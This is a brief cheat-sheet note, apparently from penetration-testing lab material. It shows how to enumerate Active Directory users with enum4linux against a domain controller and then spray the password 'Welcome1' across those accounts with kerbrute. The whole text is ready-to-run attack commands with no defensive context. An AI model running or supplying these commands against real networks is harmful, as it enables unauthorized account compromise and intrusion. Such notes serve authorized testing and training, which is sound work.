Internal Password Spraying - from Linux
June 29, 2024

enum4linux -U 172.16.5.5 | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]" > valid-user.txt
wc valid-user.txt

kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid-user.txt Welcome1


Last updated